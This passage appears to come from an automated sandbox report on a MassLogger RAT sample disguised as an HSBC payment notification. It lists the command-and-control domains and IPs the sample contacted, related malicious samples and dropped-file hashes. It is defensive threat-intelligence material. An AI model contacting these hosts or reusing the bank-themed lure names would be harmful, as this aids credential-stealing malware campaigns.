https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz	armsvc.exe, 00000003.00000003.1480241091.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1480703617.0000000002280000.00000004.00000020.00020000.00000000.sdmp	false		high
http://82.112.184.197/	armsvc.exe, 00000003.00000003.1774140631.0000000000755000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
72.52.179.174	ww99.przvgke.biz	United States	32244	LIQUIDWEBUS	false
199.59.243.227	76899.bodis.com	United States	395082	BODIS-NJUS	false
172.234.222.138	przvgke.biz	United States	20940	AKAMAI-ASN1EU	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
76.223.26.96	084725.parkingcrew.net	United States	16509	AMAZON-02US	false
44.221.84.105	saytjshyf.biz	United States	14618	AMAZON-AESUS	false
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
54.244.188.177	pywolwnvd.biz	United States	16509	AMAZON-02US	false
13.251.16.150	ifsaia.biz	United States	16509	AMAZON-02US	false
47.129.31.212	xlfhhhm.biz	Canada	34533	ESAMARA-ASRU	false
82.112.184.197	vjaxhpbji.biz	Russian Federation	43267	FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU	false
18.141.10.107	ssbzmoy.biz	United States	16509	AMAZON-02US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574778
Start date and time:	2024-12-13 15:46:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	3
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winEXE@20/162@24/13
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 82% Number of executed functions: 93 Number of non-executed functions: 193
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchFilterHost.exe, dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, SIHClient.exe, VSSVC.exe, SearchIndexer.exe, SearchProtocolHost.exe, WMIADAP.exe, conhost.exe, WmiApSrv.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Simulations

Behavior and APIs

Time	Type	Description
09:47:18	API Interceptor	1x Sleep call for process: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe modified
09:47:18	API Interceptor	13x Sleep call for process: armsvc.exe modified
09:47:23	API Interceptor	108048x Sleep call for process: perfhost.exe modified
11:08:17	API Interceptor	205326x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	41570002689_20220814_05352297_HesapOzeti.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	malware.ps1	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Shipping Documents.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	QUOTES REQUEST FOR PRICES.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Bank Swift and SOA PVRN0072700314080353_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	file.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	ST07933.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Price Quotation-01.dqy.dll	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	ORDER-6070Y689_0PF57682456_DECVC789378909740.js	Get hash	malicious	WSHRat, Snake Keylogger	Browse	checkip.dyndns.org/
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi Img docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
72.52.179.174	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	ww99.przvgke.biz/snsobwmcccpnrm
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	ww99.fwiwk.biz/mepglnjkcg
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	ww99.przvgke.biz/fauopp
	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	ww99.fwiwk.biz/a
	8dPlV2lT8o.exe	Get hash	malicious	Simda Stealer	Browse	gatyhub.com/login.php
	7ObLFE2iMK.exe	Get hash	malicious	Simda Stealer	Browse	gatyhub.com/login.php
	UMwpXhA46R.exe	Get hash	malicious	Simda Stealer	Browse	gatyhub.com/login.php
	1fWgBXPgiT.exe	Get hash	malicious	Simda Stealer	Browse	gatyhub.com/login.php
	arxtPs1STE.exe	Get hash	malicious	Simda Stealer	Browse	gatyhub.com/login.php
	Z8eHwAvqAh.exe	Get hash	malicious	Simda Stealer	Browse	gatyhub.com/login.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
przvgke.biz	RFQ_PO N89397-GM7287-Order.bat.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.234.222.138
	invoice_96.73.exe	Get hash	malicious	FormBook	Browse	172.234.222.143
	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	172.234.222.143
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	172.234.222.143
	PO #09465610_GQ 003745_SO-242000846.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.234.222.143
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	172.234.222.143
ssbzmoy.biz	INV_NE_02_2034388.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	Shipment Notification.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	Request for Quotation.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	RFQ _ Virtue 054451000085.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	RFQ_PO N89397-GM7287-Order.bat.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
76899.bodis.com	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	199.59.243.227
	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	199.59.243.227
	http://readabilityscore.com	Get hash	malicious	Unknown	Browse	199.59.243.226
	http://bonalluterser.com/	Get hash	malicious	Unknown	Browse	199.59.243.226
	file.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Stealc, Xmrig	Browse	199.59.243.225
	S23UhdW5DH.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc	Browse	199.59.243.225
	xPUqa4qbDL.js	Get hash	malicious	Unknown	Browse	199.59.242.153
knjghuig.biz	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	18.141.10.107
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	invoice_96.73.exe	Get hash	malicious	FormBook	Browse	18.141.10.107
	Order SMG 201906 20190816order.pdf.scr.exe	Get hash	malicious	AgentTesla, MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	18.141.10.107
	PO #09465610_GQ 003745_SO-242000846.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	18.141.10.107
	IBKB.vbs	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	18.141.10.107

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LIQUIDWEBUS	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	72.52.179.174
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	72.52.179.174
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	72.52.179.174
	akcqrfutuo.elf	Get hash	malicious	Unknown	Browse	67.225.207.146
	xobftuootu.elf	Get hash	malicious	Unknown	Browse	67.225.254.236
	http://editableslides.co	Get hash	malicious	HTMLPhisher, TechSupportScam	Browse	67.227.216.154
	https://bielefelde.de/	Get hash	malicious	Unknown	Browse	72.52.179.174
	Ziraat_Swift.hta	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	72.52.179.174
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse	173.199.128.107
	sora.ppc.elf	Get hash	malicious	Mirai	Browse	69.167.163.83
UTMEMUS	41570002689_20220814_05352297_HesapOzeti.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	malware.ps1	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Shipping Documents.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	QUOTES REQUEST FOR PRICES.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Bank Swift and SOA PVRN0072700314080353_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	DEC 2024 RFQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	file.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Request for quote.doc	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	ST07933.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	Price Quotation-01.dqy.dll	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
BODIS-NJUS	Payment Copy #190922-001.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	new.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	PURCHASE REQUIRED DETAILS 000487958790903403.exe	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	199.59.243.227
	Need Price Order No.17084 PARLOK.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	http://doctifyblog.com	Get hash	malicious	Unknown	Browse	199.59.243.227
	DHL_734825510.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	QUOTATON-37839993.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	lgkWBwqY15.exe	Get hash	malicious	FormBook	Browse	199.59.243.227

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	77541373_BESOZT00_2024_99101234_1_4_1.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	Bloxflip Predictor.exe	Get hash	malicious	Njrat	Browse	104.21.67.152
	CVmkXJ7e0a.exe	Get hash	malicious	SheetRat	Browse	104.21.67.152
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	Request for Quotations and specifications.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	hesaphareketi-01.pdfsxlx..exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	41570002689_20220814_05352297_HesapOzeti.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	malware.ps1	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
3b5074b1b5d032e5620f69f9f700ff0e	https://nam.dcv.ms/0CX72Iqyxf	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://go.eu.sparkpostmail1.com/f/a/IgPiUnQgGsgttR90IQc-hw~~/AAGCxAA~/RgRpOpvrP0QqaHR0cHM6Ly9tYXNzd29vZHBvbGlzaC5pbi93YXRlci9jb2xkL2luZGV4VwVzcGNldUIKZ1XrFlhnca8zKlISemFyZ2FyQGZhcmlkZWEuY29tWAQAAAAB#YmlsbC5ob2l0dEBwYXJ0bmVyc21ndS5jb20=	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	pxGom77XRW.doc	Get hash	malicious	Unknown	Browse	149.154.167.220
	GSAT3WdrJ8.doc	Get hash	malicious	Unknown	Browse	149.154.167.220
	YRhWQcRXWV.doc	Get hash	malicious	Unknown	Browse	149.154.167.220
	FINAL_PDF.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Filezilla.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	cv.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Filezilla-stage2.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	888.exe	Get hash	malicious	Luca Stealer	Browse	149.154.167.220

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1508864
Entropy (8bit):	4.874478215663233
Encrypted:	false
SSDEEP:	24576:UHCAR0i3/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:cCALLNiXicJFFRGNzj3
MD5:	A02D9D4457869F3120839B350A605EBD
SHA1:	B8389DEA47FD7A9BEB114BE470470C15B1D95387
SHA-256:	D9FA6261DCD9195D2C81C59FC1442C11F55A9EB441E0786CDF11A339419DB0B4
SHA-512:	D2EE78182BBEC35BE0BF29A472154A25CCFB7B432B42554B2B3E6385445D8454FBA72CD126BADF2BD891B9AC4158A7BEB53CD404E2FC11AEEA5B7668C4AF0831
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@.........................................................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....`...p.......f..............@...................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Au3Info.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1450496
Entropy (8bit):	4.816168074084146
Encrypted:	false
SSDEEP:	24576:xC/KgG/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:TLNiXicJFFRGNzj3
MD5:	C46B4521C8A15551744EC3D5F7D06FB1
SHA1:	9E358D90F9E934DFED84137289FE85365DB0D6D9
SHA-256:	5FAD03EC0DADB4FE5A6DF7E7FC6BD9796625342DD65855C8E2C7A3035FEBDF4D
SHA-512:	541910B84F0197A3537BDAB3A8BA687DB59B0CA0256D27D82B1474226CD62AD0B1BE8ACCBF29A0EEBD9B7714395D216F0E5E81F6A44D799D37BA84FB45860F6E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.\|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@...........................-......k......................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...\|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...p...`.......r..............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1469952
Entropy (8bit):	4.81537981685165
Encrypted:	false
SSDEEP:	24576:QKdH7/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:9dbLNiXicJFFRGNzj3
MD5:	5A2EA98F061D5D5E9E05EDD1BAAD966A
SHA1:	5FBB0B7A083908CE6443D92C595F3C99A3AABB0C
SHA-256:	C05B5009E39963B290396D60C4D461C4AFEA0B4C1D712AB81B9BC0BD25F6FCCE
SHA-512:	68328BA44A1B5B80C52C4ACB15F163F9996FE12974E5A31208AA6534B37DBCB1C2C56850D9D2C351AE27459593C5E5C422C813986E1E313CA23FA4CA7A2F6A30
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@.............................0............ .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...`..........................@...................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2203136
Entropy (8bit):	7.642496185576564
Encrypted:	false
SSDEEP:	49152:rK0eqkSR7Xgo4TiRPnLWvJDLNiXicJFFRGNzj3:rK0pR7Xn4TiRCvJD7wRGpj3
MD5:	E7AC417F439671970A0EA829B1218B71
SHA1:	AAEBA6C6E5B0C0C45C47CD5DA0AFC045E860FB69
SHA-256:	078AE884DBD19BCE86F10EBCBC2A1B145F175F8A60462C3DDFDE3D83C7A7CD32
SHA-512:	5C7D8125DEC37DCCB9E3E6D242C4EDD5BA619C6B0919B6EFE7A55CA0736FACF26755A1E97FB51FB4ECAA3699A604D2707A4B9CDCF720059BADE4EDED57EDF04F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@...........................".....]V"..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2369024
Entropy (8bit):	7.561292081801035
Encrypted:	false
SSDEEP:	49152:ZfYP1JsEDkSR7Xgo4TiRPnLWvJDLNiXicJFFRGNzj3:pYPBR7Xn4TiRCvJD7wRGpj3
MD5:	C9BFFC5C979839B98BD24A452AEAD447
SHA1:	5F00D66470A36B241C0676FBEA2D4CE10B42D644
SHA-256:	896C5B101C8929AEC14E131B4666AFE12134129F55A6FA62EFBAB811E4A2828B
SHA-512:	EF310448FB1F1480B6AB00ECF4B2527EE1674AC128AC1BF1B244F20FE219A6017D4E0B24877684E03C430C53AC33C138AFDCEC61E3FC9E5BDA94DFD95E53E60D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....\|......}.a...p..i...p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$......Q$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1400832
Entropy (8bit):	4.651223540316205
Encrypted:	false
SSDEEP:	24576:xYUcknl/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:xZcknlLNiXicJFFRGNzj3
MD5:	47B3AD097B446D25BAFDB715A75C8AD2
SHA1:	79F309829396E6A0776CE5E3C24AB7452B2E5E12
SHA-256:	AF81F01468E7378FBC7A716152E57810A18A2FBE69D32972826248C16484BE4C
SHA-512:	5C2B34CC72530B13E1D85BBA126C872D1A63FAB067CEDCA6408640FAE86262093D7FDAE368F07B612B2BF9578C5D802890925D62679524FE57AB00998F55CE75
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................P ......u.......................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...p..........................@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1640448
Entropy (8bit):	7.159463050021509
Encrypted:	false
SSDEEP:	49152:356AqSPyC+NltpScpzbtvpJoMQSq/jrQaS/LNiXicJFFRGNzj3:WSktbpl7wRGpj3
MD5:	540094263694E874858CE5B119380F5C
SHA1:	A56A1D912A84441DD6D2935E05EC97742F2AF6E5
SHA-256:	926C43AA41BB16A3EA45D6372B99EEB32F787A5383ED4C1BEA63250AAF743B9C
SHA-512:	B75A0FD2FC903FA1EA07603EF03BD199413A7F9CDA5FAAFEB44AC442BCCB4AAC0AA610EEC1834995B026B2F28215CCEE4805C74B13C76389DC1976D5FB79E410
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@....................................3..... ...@...............@..............................l..\|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..\|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2953728
Entropy (8bit):	7.08973636378949
Encrypted:	false
SSDEEP:	49152:oGSXoV72tpV9XE8Wwi1aCvYMdjluS/fYw44RxLILNiXicJFFRGNzj3:44OEtwiICvYM3fo7wRGpj3
MD5:	BD039ABA8B80B8E84A95E7AD011CC61B
SHA1:	3A53C52AF21B985C17B65EE3D0EBEC7C33752B9A
SHA-256:	C73287ACAAD73578D977D4B40F6D2D4F86A65FEE0CA33E5E003F5D6AA206B222
SHA-512:	0E1551A8F3FFF8D1DAC25C49294C42BED2597AE46A9E13146FF8344B6E14B348538F3CA0A43307B3CCE1AE8FB877299BE1B92F57CB63F4CD01FDB57CDE665F4E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-.......-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1641472
Entropy (8bit):	5.0750155779945345
Encrypted:	false
SSDEEP:	24576:/AMvR+3kMbVjhn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:oE+lbVjhnLNiXicJFFRGNzj3
MD5:	08216A5999210640DBE2E2F1621CB8CE
SHA1:	B7B030D88CCDE189EF6C0E17FC5A6D4B2300015A
SHA-256:	0092B59E5984620CB99C36474F2BC3326783986174A137C3FF2F22574EEFC8C5
SHA-512:	091E4C9EBB0E6D29E44FB316011BAD56D02D9400CE0E96EC791B138540F339A8B160751A58F9C8C3E609C0BBF6800D61F193D83D6697111812221822218225AE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@.......................... $..............................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...............<..............@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Download File

Process:	C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
